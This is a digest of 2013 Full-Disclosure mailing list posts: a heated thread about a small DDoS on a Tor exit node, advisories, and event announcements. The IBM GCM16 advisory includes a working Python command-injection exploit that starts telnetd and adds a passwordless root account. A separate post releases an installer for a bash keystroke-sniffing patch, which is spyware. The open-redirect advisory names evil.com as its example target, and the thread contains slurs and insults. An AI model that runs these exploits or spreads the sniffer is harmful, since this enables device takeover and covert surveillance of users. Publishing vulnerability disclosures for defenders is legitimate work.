Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread Daniel Preussker 
+1


Daniel Preussker

[ Research and Engineering
[ dan...@preussker.net
[ http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x87E736968E490AA1

On 16.08.2013, at 23:49, adam wrote:

> Jann, you know what's even worse than someone being a dick for no
> reason? Someone being a _stupid_ dick for no reason. In case you're
> unaware, the word "massive" was completely absent from this thread
> until YOU attempted to put it in someone elses' mouth. Beyond that,
> since you want to rip apart an innocent guy's post, let's see what
> happens when someone does it to yours.
> 
> "DDoS? So you mean your systems were impacted by that?"
> 
> Impacted is not the word you were looking for, since the answer to
> that would technically be a yes - not the no you were expecting. That
> aside, a denial of service attack is still a denial of service attack
> regardless of whether it succeeds or not. In fact, if you look up the
> definition - you'll see that it's _an attempt_ to make X unavailable.
> Not necessarily a successful one.
> 
> "Let me google that for you. Hmm. Assigned to "Polipo Web proxy"."
> 
> Psst.. you may want to read the entire thread title.
> 
> "Oooh, a storm!"
> 
> storm
> Verb
> Move angrily or forcefully in a specified direction: "she stormed off".
> 
> Whether you like it or not, it meets the definition.
> 
> "Your systems were impacted by a DoS attack with 30 packets per
> second? You might
> want to upgrade to hardware that is a few decades newer."
> 
> How much of the original post did you actually read? Nowhere in it did
> the OP say that this attack succeeded. Again, just like above - YOU
> are the one who first used the word impact[ed]. It's funny how you put
> words in peoples' mouths, and then reply to them as though they
> actually said it. More than that, the only thing the OP mentioned was
> that one of his log files were corrupted in the process of the attack.
> I didn't read that the attack succeeded, shut down the service, his
> machine, his network or anything else - and neither did you.
> 
> "You were attacked by "O=TCP SPT=2216"? Cool story."
> 
> Oh my God, there was a line in there that didn't have an IP address?
> What a RETARD the OP must be. How can anyone be so stupid? I bet the
> earth stopped spinning when that happened. Think so?
> 
> "He said above 30 packets per second, right? I'll just assume it's around 30.
> And the sample packet from that "packet storm" contained this part: "LEN=52".
> So that's around 1500 bytes per second, or 12 kilobits per second. And those
> packets are downstream for him."
> 
> You're randomly assuming that all of the packets were the exact same
> length, which makes anything derived from that assumption
> automatically flawed.
> 
> "A good modem connection can give you up to 56kbit/s per direction as far as I
> understand."
> 
> You've never used dialup, have you? What you're saying is that "good
> modems" (what exactly is a bad modem?) get 7KB/s down and 7KB/s up -
> that is completely untrue. It's a lot closer to 5KB/s down (if you're
> lucky) and 2KB/s up. Aside from all of this, again, I reiterate that
> you have no idea what size the other 19,044 packets were. Anyway, yes
> - if your assumption were correct (52*19045 through a 56k modem) then
> it'd take only a few minutes to download all of the data (which
> doesn't even total a meg).
> 
> HOWEVER, there are still a multitude of things wrong with your entire
> stance. Firstly, bandwidth exhaustion is NOT the only way to perform a
> denial of service. In fact, in my opinion, it should be the last
> resort. There are much much better ways to do it, depending on the
> service being targeted. For example, some popular multiplayer games
> can be brought down with a single packet. Some can be kept down with
> that single packet, others require one group of packets to be kept
> down, and then some others require that one packet every X minutes. I
> use game servers only as an example.
> 
> If his log becoming corrupted was intentional, then it's entirely
> possible that the point of the attack wasn't to exhaust bandwidth but
> to crash the actual server application (or worse, exploit it in a way
> that can lead to remote access). No matter what the case though,
> almost every one of your points have been based on seemingly random
> (and likely inapplicable) assumptions you've made. So on top of coming
> across as a prick, you're also coming across as a clueless prick. And
> for no reason whatsoever.
> 
> Way to go.
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 



PGP.sig
Description: This is a digitally signed message part
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread Stefan Jon Silverman 
Title: Message

  
  
+1
  



 
 

  
Regards,
Stefan

  


 
  
  On 8/16/2013 2:49 PM, adam wrote:


  Jann, you know what's even worse than someone being a dick for no
reason? Someone being a _stupid_ dick for no reason. In case you're
unaware, the word "massive" was completely absent from this thread
until YOU attempted to put it in someone elses' mouth. Beyond that,
since you want to rip apart an innocent guy's post, let's see what
happens when someone does it to yours.

"DDoS? So you mean your systems were impacted by that?"

Impacted is not the word you were looking for, since the answer to
that would technically be a yes - not the no you were expecting. That
aside, a denial of service attack is still a denial of service attack
regardless of whether it succeeds or not. In fact, if you look up the
definition - you'll see that it's _an attempt_ to make X unavailable.
Not necessarily a successful one.

"Let me google that for you. Hmm. Assigned to "Polipo Web proxy"."

Psst.. you may want to read the entire thread title.

"Oooh, a storm!"

storm
Verb
Move angrily or forcefully in a specified direction: "she stormed off".

Whether you like it or not, it meets the definition.

"Your systems were impacted by a DoS attack with 30 packets per
second? You might
want to upgrade to hardware that is a few decades newer."

How much of the original post did you actually read? Nowhere in it did
the OP say that this attack succeeded. Again, just like above - YOU
are the one who first used the word impact[ed]. It's funny how you put
words in peoples' mouths, and then reply to them as though they
actually said it. More than that, the only thing the OP mentioned was
that one of his log files were corrupted in the process of the attack.
I didn't read that the attack succeeded, shut down the service, his
machine, his network or anything else - and neither did you.

"You were attacked by "O=TCP SPT=2216"? Cool story."

Oh my God, there was a line in there that didn't have an IP address?
What a RETARD the OP must be. How can anyone be so stupid? I bet the
earth stopped spinning when that happened. Think so?

"He said above 30 packets per second, right? I'll just assume it's around 30.
And the sample packet from that "packet storm" contained this part: "LEN=52".
So that's around 1500 bytes per second, or 12 kilobits per second. And those
packets are downstream for him."

You're randomly assuming that all of the packets were the exact same
length, which makes anything derived from that assumption
automatically flawed.

"A good modem connection can give you up to 56kbit/s per direction as far as I
understand."

You've never used dialup, have you? What you're saying is that "good
modems" (what exactly is a bad modem?) get 7KB/s down and 7KB/s up -
that is completely untrue. It's a lot closer to 5KB/s down (if you're
lucky) and 2KB/s up. Aside from all of this, again, I reiterate that
you have no idea what size the other 19,044 packets were. Anyway, yes
- if your assumption were correct (52*19045 through a 56k modem) then
it'd take only a few minutes to download all of the data (which
doesn't even total a meg).

HOWEVER, there are still a multitude of things wrong with your entire
stance. Firstly, bandwidth exhaustion is NOT the only way to perform a
denial of service. In fact, in my opinion, it should be the last
resort. There are much much better ways to do it, depending on the
service being targeted. For example, some popular multiplayer games
can be brought down with a single packet. Some can be kept down with
that single packet, others require one group of packets to be kept
down, and then some others require that one packet every X minutes. I
use game servers only as an example.

If his log becoming corrupted was intentional, then it's entirely
possible that the point of the attack wasn't to exhaust bandwidth but
to crash the actual server application (or worse, exploit it in a way
that can lead to remote access). No matter what the case though,
almost every one of your points have been based on seemingly random
(and likely inapplicable) assumptions you've made. So on top of coming
across as a prick, you're also coming across as a clueless prick. And
for no reason whatsoever.

Way to go.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



  


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread adam 
Jann, you know what's even worse than someone being a dick for no
reason? Someone being a _stupid_ dick for no reason. In case you're
unaware, the word "massive" was completely absent from this thread
until YOU attempted to put it in someone elses' mouth. Beyond that,
since you want to rip apart an innocent guy's post, let's see what
happens when someone does it to yours.

"DDoS? So you mean your systems were impacted by that?"

Impacted is not the word you were looking for, since the answer to
that would technically be a yes - not the no you were expecting. That
aside, a denial of service attack is still a denial of service attack
regardless of whether it succeeds or not. In fact, if you look up the
definition - you'll see that it's _an attempt_ to make X unavailable.
Not necessarily a successful one.

"Let me google that for you. Hmm. Assigned to "Polipo Web proxy"."

Psst.. you may want to read the entire thread title.

"Oooh, a storm!"

storm
Verb
Move angrily or forcefully in a specified direction: "she stormed off".

Whether you like it or not, it meets the definition.

"Your systems were impacted by a DoS attack with 30 packets per
second? You might
want to upgrade to hardware that is a few decades newer."

How much of the original post did you actually read? Nowhere in it did
the OP say that this attack succeeded. Again, just like above - YOU
are the one who first used the word impact[ed]. It's funny how you put
words in peoples' mouths, and then reply to them as though they
actually said it. More than that, the only thing the OP mentioned was
that one of his log files were corrupted in the process of the attack.
I didn't read that the attack succeeded, shut down the service, his
machine, his network or anything else - and neither did you.

"You were attacked by "O=TCP SPT=2216"? Cool story."

Oh my God, there was a line in there that didn't have an IP address?
What a RETARD the OP must be. How can anyone be so stupid? I bet the
earth stopped spinning when that happened. Think so?

"He said above 30 packets per second, right? I'll just assume it's around 30.
And the sample packet from that "packet storm" contained this part: "LEN=52".
So that's around 1500 bytes per second, or 12 kilobits per second. And those
packets are downstream for him."

You're randomly assuming that all of the packets were the exact same
length, which makes anything derived from that assumption
automatically flawed.

"A good modem connection can give you up to 56kbit/s per direction as far as I
understand."

You've never used dialup, have you? What you're saying is that "good
modems" (what exactly is a bad modem?) get 7KB/s down and 7KB/s up -
that is completely untrue. It's a lot closer to 5KB/s down (if you're
lucky) and 2KB/s up. Aside from all of this, again, I reiterate that
you have no idea what size the other 19,044 packets were. Anyway, yes
- if your assumption were correct (52*19045 through a 56k modem) then
it'd take only a few minutes to download all of the data (which
doesn't even total a meg).

HOWEVER, there are still a multitude of things wrong with your entire
stance. Firstly, bandwidth exhaustion is NOT the only way to perform a
denial of service. In fact, in my opinion, it should be the last
resort. There are much much better ways to do it, depending on the
service being targeted. For example, some popular multiplayer games
can be brought down with a single packet. Some can be kept down with
that single packet, others require one group of packets to be kept
down, and then some others require that one packet every X minutes. I
use game servers only as an example.

If his log becoming corrupted was intentional, then it's entirely
possible that the point of the attack wasn't to exhaust bandwidth but
to crash the actual server application (or worse, exploit it in a way
that can lead to remote access). No matter what the case though,
almost every one of your points have been based on seemingly random
(and likely inapplicable) assumptions you've made. So on top of coming
across as a prick, you're also coming across as a clueless prick. And
for no reason whatsoever.

Way to go.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread Jeffrey Walton 
On Fri, Aug 16, 2013 at 4:30 PM, Jann Horn  wrote:
> On Fri, Aug 16, 2013 at 01:37:54PM -0400, Jeffrey Walton wrote:
>> On Fri, Aug 16, 2013 at 1:31 PM, Jann Horn  wrote:
>> > On Thu, Aug 15, 2013 at 05:29:52PM -0300, Luther Blissett wrote:
>> >> Hello dear companions,
>> >>
>> >> Two days ago one of my tor exit nodes experienced something I'm now
>> >> calling "limestonenetworks DDoS on polipo" ( $WAN_IP:8123 ), since all
>> >
>> > DDoS? So you mean your systems were impacted by that?
>> He may be running an exit node for the benefit of others on a low
>> bandwidth connection.
>>
>> Forgive me if you were joking with an old friend, or I missed something.
>
> Let's check how massive that "attack" is.
I didn't claim it was massive. I simply said he may be bandwidth limited.

What other traffic is on that line? Or do all Tor folks purchase a
second internet connection for their Tor services?

Jeff

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread Jann Horn 
On Fri, Aug 16, 2013 at 01:37:54PM -0400, Jeffrey Walton wrote:
> On Fri, Aug 16, 2013 at 1:31 PM, Jann Horn  wrote:
> > On Thu, Aug 15, 2013 at 05:29:52PM -0300, Luther Blissett wrote:
> >> Hello dear companions,
> >>
> >> Two days ago one of my tor exit nodes experienced something I'm now
> >> calling "limestonenetworks DDoS on polipo" ( $WAN_IP:8123 ), since all
> >
> > DDoS? So you mean your systems were impacted by that?
> He may be running an exit node for the benefit of others on a low
> bandwidth connection.
> 
> Forgive me if you were joking with an old friend, or I missed something.

Let's check how massive that "attack" is.

He said above 30 packets per second, right? I'll just assume it's around 30.
And the sample packet from that "packet storm" contained this part: "LEN=52".
So that's around 1500 bytes per second, or 12 kilobits per second. And those
packets are downstream for him.

Now take a look at .
A good modem connection can give you up to 56kbit/s per direction as far as I
understand. So unless I made some weird calculation errors, someone on a good
modem connection should be able to take that "attack" without any problems.

An "attack" from one (!) bot on a normal DSL line should already be much bigger.

Calling this a DoS attack would be ridiculous, calling it a DDoS even more so.

(Of course, it might still be that he really was hacked and his systems were
attacked in a smarter way, but it's very clear that nobody tried to take him
out with pure bandwidth.)


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CVE-2013-0526 IBM GCM16/32 Remote Command Execution.

2013-08-16 Thread Alejandro Alvarez 
I. Product description

The IBM 1754 GCM family provides KVM over IP and serial console management
technology in a single appliance.


II. Vulnerability information

Impact: Command execution
Remotely exploitable: yes
CVE: 2013-0526
CVS Score: 8.5


III. Vulnerability details

GCM16 (v.1.18.0.22011) and older versions of this KVM switch contain a flaw
that allows a remote authenticated user to execute unauthorized commands as
root.

This flaw exist because webapp variables are not sanitised. In this case,
parameters $count and $size from ping.php allow to create a special crafted
URL to inject text to an exec() so it can be arbitrary used to execute any
command on the KVM embedded linux.


IV. Proof of concept

Following is a simple exploit that lead to root access to the device,
opening a telnet and creating a new user with root permission without
password (sessid and target are hardcoded so it must be changed to work):


#!/usr/bin/python

"""

This exploit for Avocent KVM switch allows to gain root access to embedded
device. SessionId (avctSessionId) is neccesary for this to work, so you
need a valid user. Default user is "Admin" with blank password.

After running exploit, connect using telnet to device with user target
(pass: target) then do "/tmp/su - superb" to gain root

"""

from StringIO import StringIO
import pycurl
import re
sessid = "X"
target = "https://ip.of.kvm/ping.php"; 

command = "/sbin/telnetd ; echo superb::0:0:owned:/:/bin/sh >> /etc/passwd
; cp /bin/busybox /tmp/su ; chmod 6755 /tmp/su ; echo done. now connect to
device using telnet with user target and pass target, then \"/tmp/su -
superb\""

storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, target)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.POSTFIELDS, 'address=255.255.255.255&action=ping&size=56&count=1
; echo *E* ; ' + command + ' ; echo *E*')
c.setopt(c.COOKIE,'avctSessionId=' + sessid)

try:
 c.perform()
 c.close()
except:
 print ""

content = storage.getvalue()
x1 = re.search(r"\*E\*(.*)\*E\*",content)
print x1.group(1).replace("","\n")


V. Vendor Response

IBM released a new firmware that corrects this vulnerability (1.20.0.22575)


VI. Timeline

2013-06-12 - Vendor (IBM PSIRT) notified.
2013-06-12 - Vendor assigns internal ID.
2013-07-02 - Vendor confirms the vulnerability.
2013-08-16 - Vulnerability disclosed and patch released.


VII. External information

Information about this vulnerability (in spanish):
http://www.bitcloud.es/2013/08/vulnerabilidad-en-kvms-gcm1632-de-ibm.html
IBM Security Bulletin:
http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5093509



-- 
--
Alejandro Alvarez Bravo
alex.a.br...@gmail.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] t2'13: Challenge to be released 2013-09-07 10:00 EEST

2013-08-16 Thread Tomi Tuominen 

It is that time of the year again - we’re pleased to announce the
release of the t2’13 Challenge!

Soon after t2’12 was over, we discovered that the conference had been 
infiltrated by an APT. Our best guess is that the APT pwned the laptop 
of one of the conference organizers and successfully exfiltrated some 
data. Luckily for us, our beloved APT got so hammered on the conference 
dinner on Thursday that he forgot his USB thumb drive to Zetor. We are 
confident that this OPSEC blunder will lead us to what was stolen but 
despite our best efforts we have not been able to decipher the contents 
of the USB drive. Your mission, should you choose to accept it, is to 
recover the stolen content.


The first person to recover all content will win a free ticket to 
t2’13 conference. In addition to this, the creators of the Challenge 
will select another winner among the next ten correct answers. The 
criteria for the other selection is the elegance of the answer. In 
short, you can win with both speed and style.


The t2’13 Challenge will be released 2013-09-07 10:00 EEST right here 
at http://t2.fi/


Good luck,

  T

pS. Seriously, this is even better than last year ;)

--
Tomi 'T' Tuominen | Founder @ t2 infosec conference | https://t2.fi

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread Jeffrey Walton 
On Fri, Aug 16, 2013 at 1:31 PM, Jann Horn  wrote:
> On Thu, Aug 15, 2013 at 05:29:52PM -0300, Luther Blissett wrote:
>> Hello dear companions,
>>
>> Two days ago one of my tor exit nodes experienced something I'm now
>> calling "limestonenetworks DDoS on polipo" ( $WAN_IP:8123 ), since all
>
> DDoS? So you mean your systems were impacted by that?
He may be running an exit node for the benefit of others on a low
bandwidth connection.

Forgive me if you were joking with an old friend, or I missed something.

Jeff

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread Jann Horn 
On Thu, Aug 15, 2013 at 05:29:52PM -0300, Luther Blissett wrote:
> Hello dear companions,
> 
> Two days ago one of my tor exit nodes experienced something I'm now
> calling "limestonenetworks DDoS on polipo" ( $WAN_IP:8123 ), since all

DDoS? So you mean your systems were impacted by that?


> packets in the storm were flowing from a range of 514 different IP
> addresses, all of them inside limestonenetworks IP range and targeting
> port 8123 on my tor exit node WAN IP.

Let me google that for you. Hmm. Assigned to "Polipo Web proxy". So maybe
someone tried to connect to them through your exit node and they do proxyscans
on people who connect to them?


> Before the packet storm,

Oooh, a storm!


> The attack persisted for at least three hours and left this binary (hex
> represented):
> 
> 000        
> *
> b90       2067 3331
> ba0 3220 3a30 3135 303a 2034 6174 6567 7573
> bb0 7568 7520 6573 2e72 6177 6e72 6b20 7265
> bc0 656e 3a6c 5b20 6168 6d6d 7265 205d 203a
> bd0 4e49 763d 616c 326e 4f20 5455 203d 414d
> be0 3d43 3030 323a 3a31 3732 663a 3a61 6464
> bf0 343a 3a34 3030 313a 3a35 3966 323a 3a61
> c00 6639 643a 3a39 3830 303a 3a30 3534 303a
> c10 3a30 3030 333a 2034 5253 3d43 3132 2e36
> c20 3432 2e35 3232 2e31 3031 2037 5344 3d54
> c30 3831 2e39 3833 322e 3533 322e 3035 4c20
> c40 4e45 353d 2032 4f54 3d53 7830 3030 5020
> c50 4552 3d43 7830 3030 5420 4c54 343d 2038
> c60 4449 313d 3335 3431 4420 2046 5250 544f
> c70 3d4f 4354 2050 5053 3d54 3932 3635 4420
> c80 5450 383d 3231 2033 4957 444e 574f 363d
> c90 3535 3533 5220 5345 303d 3078 2030 5953
> ca0 204e 5255 5047 303d 000a   
> ca9

Maybe your disk is just broken?


> Attached is the list of participating IP addresses, line by line, with
> the count of packets received. The attacker started sending something
> like 4 packets per second and increased to over than 9000!!! - just
> kidding, over 30 per second.


Your systems were impacted by a DoS attack with 30 packets per second? You might
want to upgrade to hardware that is a few decades newer.

> 74.63.255.118: 248 
> 216.245.193.201: 235 
> 208.115.232.205: 231 
> 74.63.255.119: 225 
> 216.245.193.200: 219
[...]
> O=TCP SPT=2216 : 1 

You were attacked by "O=TCP SPT=2216"? Cool story.


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Advisory: Unfuddle.com - Open Redirection

2013-08-16 Thread LIAD Mizrachi 
Advisory: Unfuddle.com - Open Redirection
Author: Liad Mizrachi
Vendor URL: http://unfuddle.com
Status: Fixed



==
Vulnerability Description
==

Unfuddle offers secure, hosted software project management environment.
When unauthenticated user tries to access a resource on he’s site directly,
he will be redirected to a login page with the reference parameter set to
the resource location.

For Example:
Accessing: 
https://userSub.unfuddle.com/a%23/projects/1/
Will redirects to user to:
https://userSub.unfuddle.com/a#/session/new?reference=https%3A//mom3nt0.unfuddle.com/a%23/projects/1/

The redirection is not strictly to internal resources, but can also be used
to redirect users to external site
https://userSub.unfuddle.com/a#/session/new?reference=http://evil.com/
will redirect the user to http://evil.com after entering the correct
credentials in the login page.



==
Solution
==

Fixed by vendor


==
Disclosure Timeline
==

14-July-2013 - vendor informed
16-June-2013 - fixed


==
References
==

http://unfuddle.com
https://vimeo.com/72202542
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] JoinSEC London - October

2013-08-16 Thread Ralf Braga 
About the JoinSEC London



Designed by Information Security professionals



The Information Security has been one of the most increasing concerns
worldwide. Everyday new attacks and counter attacks emerge, making it
impossible for professionals to keep themselves up to date.



The JoinSEC London (first edition) intends to convene busy IT and
Information Security Professionals with very little time to learn new
technologies or just deepen their knowledge on IT security tools and
techniques. With this in mind we gathered a group of hand picked
internationally renowned professionals to share their expertise with all
participants through training sessions and workshops.



We would like to invite the information security community to submit papers
and projects proposals.



All presentations and techniques presented and demonstrated during the
event, should be used to prevent and defense mechanisms, by industry,
technology professionals, academics, researchers, system administrators,
and other stakeholders.



Speakers will be given a 30 to 40 minutes slot, *except* for workshops or
training sessions.



Note: *If the speaker are not from UK, the organization will try (is not
guaranteed) to support some of the traveling expenses, but it will be
evaluated case by case.*



*When submiting a proposal, please include:*



   - Speaker name
   - Contact information (country/city of origin, e-mail, telephone number)
   - Presentation theme
   - Abstract/Presentation description (very simple)
   - Short Bio
   - Estimated length of presentation (30, 40 or more for training or
   workshop)
   - Macrotheme Based (Choose one below)


 Analysis of malicious code
 Anti-detection / Obfuscation techniques
 Anti-Forensics
 Botnet creation and detection
 Computer forensics
 Cryptography
 Data Recovery and Incident Response
 Exploit and vulnerability disclosure
 Firewall Evasion techniques
 Hacking GSM Networks
 Hardware Hacking
 Intrusion detection / prevention
 Malware analysis
 Malware conception
 Mobile Security (cellular technologies)
 Network scanning and analysis
 Opensource Security Technologies
 Physical security
 Protocol / Application based vulnerability exploitation
 Reverse engineering
 RFID Hacking
 Secure coding & code analysis
 Smartcard hacking
 Social engineering
 SPAM fighting
 Traffic analysis
 Virtualization attacks
 VoIP Hacking
 Web application vulnerability research
 Data Leak
 Wireless Security
 Zero Day Technology and techniques


Special attention: Purely commercial presentations and/or advertisement of
products/services will _not_ be accepted, only technical presentations.
Some comercial content may be tolerated if relativeirectly of a new
technology or methodology.


*Deadline:* papers/project proposal submission should be sent till the 31
of August 2013, to info(at)shadowsec(dot)com

Read more: 
http://www.joinsec.com/call-for-papers/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread Bart van Tuil 
Luther,

Is it just me, or is this ddos of 19045 packets in three hours a really, 
really sorry attempt at anything at all?? Even the peak of 30 pkts/sec
wouldn't really disrupt -any- service on a modern system, or disrupt any
self-respecting internet connection. I agree you shouldn't ignore the 
action by itself, but what was the actual damage?

Also, I am not clear about where you found this binary. Was it on your 
local fs? Was this just the content of the packages? If lfs, could the 
packet storm be nothing more than a distraction?

And at least 216.245.220.56 (one of the major participants); and by 
extension the rest in same subnet is not from limestone networks, and 
from far outside of USA.


I am very curious about the binary though :) if circumstance will 
allow me ill take some time to look closer this weekend.


Happy hunting,

Bart


> -Original Message-
> From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk]
> On Behalf Of Luther Blissett
> Sent: donderdag 15 augustus 2013 22:30
> To: tor-relays
> Cc: full-disclosure@lists.grok.org.uk; ad...@limestonenetworks.com; tor-
> dev
> Subject: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS
> on polipo(8123)
> 
> Hello dear companions,
> 
> Two days ago one of my tor exit nodes experienced something I'm now
> calling "limestonenetworks DDoS on polipo" ( $WAN_IP:8123 ), since all
> packets in the storm were flowing from a range of 514 different IP
> addresses, all of them inside limestonenetworks IP range and targeting
> port 8123 on my tor exit node WAN IP.
> 
> Before the packet storm, I could observe a huge increase on attempts to
> access my WAN domain through tor. I couldn't relate IP addresses from
> this first raise to those responsible for the actual packet storm nor
> could I identify some useful pattern there, but they were all coming
> from port 9001 and increased just some hours before the storm, so I'm
> guessing they are related somehow.
> 
> Also, throughout the storm, one of my log files got corrupted with some
> unreadable bin garbage. I do not know if it was intended/targeted
> exploit, but I'm reworking secrets and trying to figure out what is this
> binary.
> 
> Here is a sample line of a WAN attempt:
> 
> Aug 13 16:50:22 $USER user.warn kernel: [DROP INVALID WAN] : IN=vlan2
> OUT= MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx
> SRC=77.56.151.190 DST=xxx.xxx.xxx.xxx LEN=52 TOS=0x00 PREC=0x00 TTL=43
> ID=38787 DF PROTO=TCP SPT=40888 DPT=9001 SEQ=289854459 ACK=41163
> 
> Here is a sample line of packet storm:
> 
> Aug 13 20:39:14 $USER user.warn kernel: [hammer] : IN=vlan2 OUT=
> MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx
> SRC=74.63.216.60 DST=xxx.xxx.xxx.xxx LEN=52 TOS=0x00 PREC=0x00 TTL=48
> ID=20269 DF PROTO=TCP SPT=1757 DPT=8123 WINDOW=65535 RES=0x00 SYN URGP=0
> OP
> 
> The attack persisted for at least three hours and left this binary (hex
> represented):
> 
> 000        
> *
> b90       2067 3331
> ba0 3220 3a30 3135 303a 2034 6174 6567 7573
> bb0 7568 7520 6573 2e72 6177 6e72 6b20 7265
> bc0 656e 3a6c 5b20 6168 6d6d 7265 205d 203a
> bd0 4e49 763d 616c 326e 4f20 5455 203d 414d
> be0 3d43 3030 323a 3a31 3732 663a 3a61 6464
> bf0 343a 3a34 3030 313a 3a35 3966 323a 3a61
> c00 6639 643a 3a39 3830 303a 3a30 3534 303a
> c10 3a30 3030 333a 2034 5253 3d43 3132 2e36
> c20 3432 2e35 3232 2e31 3031 2037 5344 3d54
> c30 3831 2e39 3833 322e 3533 322e 3035 4c20
> c40 4e45 353d 2032 4f54 3d53 7830 3030 5020
> c50 4552 3d43 7830 3030 5420 4c54 343d 2038
> c60 4449 313d 3335 3431 4420 2046 5250 544f
> c70 3d4f 4354 2050 5053 3d54 3932 3635 4420
> c80 5450 383d 3231 2033 4957 444e 574f 363d
> c90 3535 3533 5220 5345 303d 3078 2030 5953
> ca0 204e 5255 5047 303d 000a
> ca9
> 
> Attached is the list of participating IP addresses, line by line, with
> the count of packets received. The attacker started sending something
> like 4 packets per second and increased to over than 9000!!! - just
> kidding, over 30 per second.
> 
> JSYK, I welcome any comments.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] bash-3.0-geinpeek shell sniffer release!

2013-08-16 Thread x90c 
Hi forks! I release it.
It's my old project to sniff keystroke on bash shell.

x90c


bash-3.0-geinpeek-0.2.tar.gz
Description: GNU Zip compressed data
#include 
#include 
#include 
#include 

/*

	bash-3.0-geinpeek-0.2 auto installer

	( install-0.2.c )

	compile # gcc install-0.2.c -o install-0.2
	execute # ./install-0.2
*/


/* tmp dir for installing */
#define	DOWNLOAD_DIR	"/root/tmp"

/* ANSI color macro */
#define SET_ANSI(){ printf("\033[0;44;36m"); }
#define UNSET_ANSI(){   printf("\033[0m");  }


/* prototype */
int download_file(char *src_url);
int checking_file(char *bin_file);
int xtract_package(char *src_url);
void select_and_patch();
void compile_geinpeek_bash();
void make_install();
void make_clean();

char needed[5][16]=
{
"/bin/bash",
"/usr/bin/patch",
"/usr/bin/wget",
"/bin/tar",
"\x00",
};

char download_list[3][128]=
{
"http://ftp.gnu.org/pub/gnu/bash/bash-3.0.tar.gz";,
"http://www.x90c.org/projects/bash-3.0-geinpeek/bash-3.0-geinpeek-0.2.tar.gz";,
	"\x00",
};

char needed_patch_list[3][64]=
{
	"Makefile.in-geinpeek.diff",
	"ghelper.c",/* sniff daemon */
	"\x00",
};
char patchkit_list[3][64]=
{
	"execute_cmd.c-geinpeek.diff",		/* main sniffing patch */
	"shell.c-geinpeek.diff",
	"\x00",	
};

char cong[]=
{
	"welcome to BASH-GEINPEEK\n\n"
	"quick execuee : # ghelper 90.txt\n"
};
	

int main()
{

	unsigned int i = 0, ret = 0;

	system("rm -rf /root/tmp");

	if(strcmp(getenv("SHELL"), "/bin/bash") == 0){
		fprintf(stderr, "\n\nfailed. to change default shell to csh!\n\n");
		return(1);
	}

	for(i = 0; download_list[i][0] != '\x00'; i++){
		if(download_file(download_list[i]) != 0){
			ret ++;
			fprintf(stderr, "failed source code(tar.gz) download :\n\t=> %s\n", download_list[i]);
		}
	}

	printf("\n");

	if(ret != 0)
		return(2);

	ret = 0;

	for(i = 0; needed[i][0] != '\x00'; i++){
		if(checking_file(needed[i]) != 0){
			ret ++;
			fprintf(stderr, "needed utility : %s\n", needed[i]);
		} else{
			printf("check: %s : found!\n", needed[i]);
		}
	}
	
	if(ret != 0)
		return(3);

	printf("\n");

	for(i = 0; download_list[i][0] != '\x00'; i++){
		if(xtract_package(download_list[i]) != 0){
			ret ++;
			fprintf(stderr, "failed downloaded file(tar.gz) extract :\n\t=> %s\n", download_list[i]);
		} else{
			printf("extract: %s : success!\n", download_list[i]);
		}
	}

	if(ret != 0)
		return(4);

	ret = 0;

	printf("\n");
	
	select_and_patch();	

	printf("\n");

